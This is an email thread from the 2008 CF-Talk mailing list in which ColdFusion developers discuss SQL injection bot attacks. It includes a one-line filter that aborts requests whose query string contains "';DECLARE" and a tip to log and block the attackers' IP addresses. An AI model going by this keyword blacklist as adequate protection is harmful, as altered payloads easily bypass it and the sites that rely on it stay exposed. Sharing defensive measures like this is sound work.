and your absolutely right, I've gotten two and query params covered it,
but it sounds like you're getting hit two pronged.
"If the injection doesn't do something, the brute force attack will"
I'm almost flattered that someone thought my site was important enough
to attack...
Scott Stewart
ColdFusion Developer
Office of Research Information Systems
Research & Economic Development
University of North Carolina at Chapel Hill
Phone:(919)843-2408
Fax: (919)962-3600
Email: [EMAIL PROTECTED]
Michael Dinowitz wrote:
> Covering the bases with cfqueryparam is one thing, being mobbed is another.
> Sometimes you have to stop these things before any other code is run. I've
> put that abort script at the top of all my application.cfcs jst to brute
> force stop the horde.
>
> On Fri, Aug 8, 2008 at 10:31 AM, Scott Stewart <[EMAIL PROTECTED]>wrote:
>
>
>> Yeah, I've gotten a couple today.. but fortunately when Ray built
>> BlogCFC. he covered his bases.
>>
>> Scott Stewart
>> ColdFusion Developer
>>
>> Office of Research Information Systems
>> Research & Economic Development
>> University of North Carolina at Chapel Hill
>>
>> Phone:(919)843-2408
>> Fax: (919)962-3600
>> Email: [EMAIL PROTECTED]
>>
>> Michael Dinowitz wrote:
>>
>>> Sorry for the problems with the House of Fusion site. We've been under
>>> massive attack by sql injection bots and I've just been able to get a
>>>
>> handle
>>
>>> on it. A fast solution to the problem is this:
>>> <cfif findnocase("';DECLARE", cgi.query_string)><cfabort></cfif>
>>> It works unless you have a few hundred attacks at a time. In that case,
>>> place a cfmail before the abort and send youself the cgi.remote_addr.
>>>
>> Then
>>
>>> block it on the webserver level. It works very well. I've blocked a dozen
>>> IPs and now the site is back to flying.
>>>
>>>
>>>
>>
>
>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to
date
Get the Free Trial
http://ad.doubleclick.net/clk;203748912;27390454;j
Archive:
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310515
Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm
Unsubscribe:
http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
